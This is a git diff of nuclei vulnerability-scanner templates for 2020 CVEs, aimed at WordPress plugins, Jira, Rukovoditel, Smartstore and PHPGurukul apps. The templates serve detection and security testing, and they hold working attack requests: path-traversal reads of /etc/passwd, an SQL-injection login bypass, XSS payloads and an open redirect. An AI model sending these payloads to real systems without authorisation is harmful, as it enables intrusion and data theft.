diff --git a/nuclei-templates/CVE-2020/CVE-2020-35749.yaml b/nuclei-templates/CVE-2020/CVE-2020-35749.yaml deleted file mode 100644 index 4fc5969b40..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-35749.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2020-35749 -info: - name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download - author: cckuailong - severity: high - description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack. - reference: - - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d - - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N - cvss-score: 7.7 - cve-id: CVE-2020-35749 - cwe-id: CWE-22 - tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-35848.yaml b/nuclei-templates/CVE-2020/CVE-2020-35848.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35848.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35848.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35984.yaml b/nuclei-templates/CVE-2020/CVE-2020-35984.yaml index b804932903..8136dd8f95 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35984.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35984.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2020-35984 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47141 + epss-percentile: 0.46456 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" @@ -62,4 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022050997d93bb77b3243f67b4ad3af9e747b98f8bf9d67f719a0796c7888638bba102203a23bb391a25437231c7a000ec59b106380fd5586bf496ae39c47a440cafd818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c093406f2e20ab363ad2e5b2e58e612c32e582979f5b76239ee293f40c516cf3022100bc62dd62624a4844c2599ec0db7386bdb99d72bf47b9f60294a335e73d51f719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-35985.yaml b/nuclei-templates/CVE-2020/CVE-2020-35985.yaml index 8fa6b4e147..fe42828880 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35985.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35985.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-35985 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47141 + epss-percentile: 0.46456 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel - tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated http: - raw: @@ -62,4 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022044d68b15d5a554c4d81e6b69ed92e6e2f797481c6ffaa255145adca158da9e77022100ade90b2a08a449dd61f18c58f8ef377c66327d18b89fba89b35ccdd1ae40d7ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a053b9e5d1b3b39b3a63962bbb73e3bd1ae057df9bb6bbd8c70a1c54e5c889a022100dbfd8d43414776fb81d37e2acca5ce6f22a4a9ae227720b8a0c06c123a48656b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-35986.yaml b/nuclei-templates/CVE-2020/CVE-2020-35986.yaml index d03b6dc8dc..360492a082 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35986.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35986.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2020-35986 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47141 + epss-percentile: 0.46456 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" @@ -62,4 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100967d9f3da38134360006f945562d7bc97ab07f5d532f93e15bb693d55dfd6cca02201fe6bd2afbab81b0ec8661d855c2df61175bd34ea1f7124298680e821f1524bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022001a1db1ce282848e286180a36258ba7a97e9ebcfd5e3bf04752665acd1be726002201be28513e9cf09e79f866ea38c6862b1004f5f20e60512c3903a76150fee9ca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-35987.yaml b/nuclei-templates/CVE-2020/CVE-2020-35987.yaml index 26a2c14fe2..eb8c02320d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35987.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35987.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2020-35987 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47141 + epss-percentile: 0.47225 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true @@ -62,4 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100a9def70b21e32211fc1e43785f8089b5e7914015e6b96d2e8f9fffe745a348e9022100de8f92c465f76b8b0ead9f9a40706ca48996586c994bf042aa00b14629b7656c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220008f7be9d19095521ee732eedcd00db1cb6c0d5ce2bfc3285e09975ecfb877fd022006d98c7cde4454aff8c6e3c19f73f57edf1f276ad7caf1c2808c837efdfcf07e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-36287.yaml b/nuclei-templates/CVE-2020/CVE-2020-36287.yaml new file mode 100644 index 0000000000..8e5e71f48c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-36287.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-36287 +info: + name: Jira Dashboard Gadgets / Information Disclosure + author: Jafar_Abo_Nada + severity: medium + description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. + tags: cve,cve2020,jira,atlassian,disclosure + reference: | + - https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116 + - https://nvd.nist.gov/vuln/detail/CVE-2020-36287 + # On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs +requests: + - raw: + - | + GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + - | + GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "contains(body_1, '')" + - "status_code_2 != 401" + condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-36289.yaml b/nuclei-templates/CVE-2020/CVE-2020-36289.yaml index 3e70a40fb5..7b2c0afd15 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-36289.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-36289.yaml @@ -1,32 +1,36 @@ id: CVE-2020-36289 + info: name: Atlassian Jira Unauth User Enumeration author: dhiyaneshDk severity: medium description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. + tags: cve,cve2020,jira,atlassian,unauth reference: - https://twitter.com/ptswarm/status/1402644004781633540 - https://nvd.nist.gov/vuln/detail/CVE-2020-36289 - - https://jira.atlassian.com/browse/JRASERVER-71559 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2020-36289 cwe-id: CWE-200 - tags: cve,cve2020,jira,atlassian,unauth + requests: - method: GET path: - '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin' - '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin' + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'rel=\"admin\"' + - type: word words: - 'application/json' diff --git a/nuclei-templates/CVE-2020/CVE-2020-36365.yaml b/nuclei-templates/CVE-2020/CVE-2020-36365.yaml new file mode 100644 index 0000000000..c3116b81e6 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-36365.yaml @@ -0,0 +1,43 @@ +id: CVE-2020-36365 + +info: + name: Smartstore <4.1.0 - Open Redirect + author: 0x_Akoko + severity: medium + description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. + remediation: | + Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. + reference: + - https://github.com/smartstore/SmartStoreNET/issues/2113 + - https://github.com/smartstore/SmartStoreNET + - https://nvd.nist.gov/vuln/detail/CVE-2020-36365 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-36365 + cwe-id: CWE-601 + epss-score: 0.00244 + epss-percentile: 0.62379 + cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: smartstore + product: smartstorenet + shodan-query: http.html:'content="Smartstore' + tags: cve2020,cve,redirect,smartstore + +http: + - method: GET + path: + - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4b0a004830460221009a56af69b3c21b9fa51cb0f1ce2fc157d3bdc58bb721e709177dc38621b0de1c022100d1822d3b7e4d326ee387d0080c3efa1014d7db6936cdb908a687e0412facc9a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-36510.yaml b/nuclei-templates/CVE-2020/CVE-2020-36510.yaml index bc0f0e5ae6..adbb20d99d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-36510.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-36510.yaml @@ -1,66 +1,35 @@ id: CVE-2020-36510 - info: - name: WordPress 15Zine <3.3.0 - Cross-Site Scripting + name: 15Zine < 3.3.0 - Reflected Cross-Site Scripting author: veshraj severity: medium description: | - WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability. + The 15Zine Wordpress theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action, leading to a reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36510 - - https://github.com/ARPSyndicate/kenzer-templates + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2020-36510 cwe-id: CWE-79 - epss-score: 0.00106 - epss-percentile: 0.42122 - cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: - verified: "false" - max-request: 1 - vendor: codetipi - product: 15zine - framework: wordpress - tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi - -flow: http(1) && http(2) - -http: - - raw: - - | - GET /wp-content/themes/15zine/readme.txt HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: word - internal: true - words: - - '/wp-content/themes/15zine/assets/' - + verified: false + tags: xss,wordpress,wp-theme,wp,cve,cve2020 +requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word part: body words: - "" - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a00473045022100c1ef38f0b31cc4796a572017f5aa569d3ca8d69d5db61193a22056a2fa4b791102205dd37e9b2682478a3d9d1e057acfd977eae5d1ccfd95e114c39457cc26e9b90e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-3952.yaml b/nuclei-templates/CVE-2020/CVE-2020-3952.yaml index a0acc3d2bc..7cc364d05c 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-3952.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-3952.yaml @@ -1,4 +1,5 @@ id: CVE-2020-3952 + info: name: vCenter Server LFI author: medbsq @@ -11,6 +12,8 @@ requests: - "{{BaseURL}}//eam/vib?id=/etc/passwd" headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + + matchers-condition: or matchers: - type: word @@ -18,7 +21,7 @@ requests: - "driver" - "dbtype" part: body - condition: and + condition: and - type: word words: - "bin/bash" diff --git a/nuclei-templates/CVE-2020/CVE-2020-5191.yaml b/nuclei-templates/CVE-2020/CVE-2020-5191.yaml index c14db103a8..07db650b42 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-5191.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-5191.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47841 - https://phpgurukul.com/hospital-management-system-in-php/ @@ -15,11 +19,17 @@ info: cvss-score: 6.1 cve-id: CVE-2020-5191 cwe-id: CWE-79 + epss-score: 0.00345 + epss-percentile: 0.68617 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve2020,hms,cms,xss,authenticated,edb,cve + verified: true + max-request: 2 + vendor: phpgurukul + product: hospital_management_system + tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul -requests: +http: - raw: - | POST /hospital/hms/admin/index.php HTTP/1.1 @@ -27,7 +37,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}}&submit=&submit= - - | POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1 Host: {{Hostname}} @@ -37,7 +46,7 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -53,5 +62,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/02 +# digest: 4a0a004730450220124a1449183f188b35b4f719c2326afa6646b898b1e01eba50c58b774045f986022100e740bb911aae6f4d5a6af96139596c6f0e7b0ae853d6d324a26b44037b0863c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-5192.yaml b/nuclei-templates/CVE-2020/CVE-2020-5192.yaml index 7897481cfa..1c118bfc6d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-5192.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-5192.yaml @@ -6,23 +6,34 @@ info: severity: high description: | Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Hospital Management System 4.0. reference: - https://www.exploit-db.com/exploits/47840 - https://phpgurukul.com/hospital-management-system-in-php/ - https://nvd.nist.gov/vuln/detail/CVE-2020-5192 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-5192 cwe-id: CWE-89 + epss-score: 0.38401 + epss-percentile: 0.96871 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve2020,hms,cms,sqli,authenticated,edb,cve - + verified: true + max-request: 2 + vendor: phpgurukul + product: hospital_management_system + tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul variables: num: "999999999" -requests: +http: - raw: - | POST /hospital/hms/doctor/index.php HTTP/1.1 @@ -30,7 +41,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}password={{password}}&submit=&submit= - - | POST /hospital/hms/doctor/search.php HTTP/1.1 Host: {{Hostname}} @@ -40,7 +50,7 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -51,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 +# digest: 4b0a00483046022100916c7a42d0436fc82b9ac530b4662f02687d7d10be9fd214377e261678aa6844022100f4a16d34647bc967921196ede47cf60acaa958982be7b443d8c1a0548c515288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-5307.yaml b/nuclei-templates/CVE-2020/CVE-2020-5307.yaml deleted file mode 100644 index ca1e464698..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-5307.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2020-5307 - -info: - name: Dairy Farm Shop Management System - SQL Injection - author: gy741 - description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. - reference: - - https://cinzinga.com/CVE-2020-5307-5308/ - severity: critical - tags: cve,cve2020,sqli - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-5307 - cwe-id: CWE-89 - -requests: - - raw: - - | - POST /dfsms/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login= - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "add-category.php" - - - type: status - status: - - 302 diff --git a/nuclei-templates/CVE-2020/cve-2020-5410.yaml b/nuclei-templates/CVE-2020/CVE-2020-5410.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5410.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5410.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-5775.yaml b/nuclei-templates/CVE-2020/CVE-2020-5775.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5775.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5775.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-5776.yaml b/nuclei-templates/CVE-2020/CVE-2020-5776.yaml index 49ae16247d..23edf290ed 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-5776.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-5776.yaml @@ -1,4 +1,5 @@ id: CVE-2020-5776 + info: name: Cross Site Request Forgery (CSRF) in MAGMI (Magento Mass Importer) Plugin author: dwisiswant0 @@ -6,16 +7,16 @@ info: description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI. reference: https://www.tenable.com/security/research/tra-2020-51 tags: cve,cve2020,magmi,magento - # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible + # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible # in the event that a CSRF is leveraged against an existing admin session for MAGMI. - # At the time of this advisory, no patch exists for this issue. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.80 cve-id: CVE-2020-5776 cwe-id: CWE-352 + requests: - raw: - | @@ -45,4 +46,4 @@ requests: condition: and - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-5847.yaml b/nuclei-templates/CVE-2020/CVE-2020-5847.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5847.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5847.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-6207.yaml b/nuclei-templates/CVE-2020/CVE-2020-6207.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-6207.yaml rename to nuclei-templates/CVE-2020/CVE-2020-6207.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-6308.yaml b/nuclei-templates/CVE-2020/CVE-2020-6308.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-6308.yaml rename to nuclei-templates/CVE-2020/CVE-2020-6308.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-6950.yaml b/nuclei-templates/CVE-2020/CVE-2020-6950.yaml index bfc641992b..177d7834d0 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-6950.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-6950.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-6950 cwe-id: CWE-22 - epss-score: 0.03494 - epss-percentile: 0.90509 + epss-score: 0.03924 + epss-percentile: 0.91792 cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: mojarra shodan-query: html:"javax.faces.resource" fofa-query: body="javax.faces.ViewState" - tags: cve,cve2020,mojarra,lfi + tags: cve,cve2020,mojarra,lfi,eclipse http: - method: GET @@ -45,4 +45,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "") || contains_all(body, "")' condition: and -# digest: 490a00463044022067f7703ca905bae30534b829360f88f19d363a62d509ab225d3dcacc5acaa26b02203cbab4d38982579a1372f0f2d4135eef0485cdfa4dded6af3b2322f801579d09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057bb165b69bcd6a648332fd9637fcd2daef818312700aca402b735e74e3bab7a022039da250736c313317b03ff12fb722f320b0ecfd1338eab919975feb262de5717:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-7048.yaml b/nuclei-templates/CVE-2020/CVE-2020-7048.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7048.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7048.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7107.yaml b/nuclei-templates/CVE-2020/CVE-2020-7107.yaml index 3f21dc114f..c526b5ecea 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-7107.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-7107.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: Fixed in version 1.8.30. reference: - https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33 @@ -19,7 +21,7 @@ info: cve-id: CVE-2020-7107 cwe-id: CWE-79 epss-score: 0.00395 - epss-percentile: 0.70518 + epss-percentile: 0.70653 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,9 +29,24 @@ info: vendor: etoilewebdesign product: ultimate_faq framework: wordpress - tags: ultimate-faqs,wpscan,cve,cve2020,xss,wordpress,wp-plugin,wp + tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign + +flow: http(1) && http(2) http: + - raw: + - | + GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Ultimate FAQ' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E" @@ -51,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203bb3a46c403280c4c47f319bd88049f45aa318b7941609c1bb2271b1bef5ec94022100d895aa459117dc04d1a35a02547e9215ee5666d3541adf57872f6680c3fa18f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a98c36c0d43554a80a17b855979ba9b1afd278daecb5f8105fca20d49ac064d4022100b582ef9291592f99197ce65d483f2f18702a4dace55e3b8e7f2fd8626364c8ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-7209.yaml b/nuclei-templates/CVE-2020/CVE-2020-7209.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7209.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7209.yaml diff --git 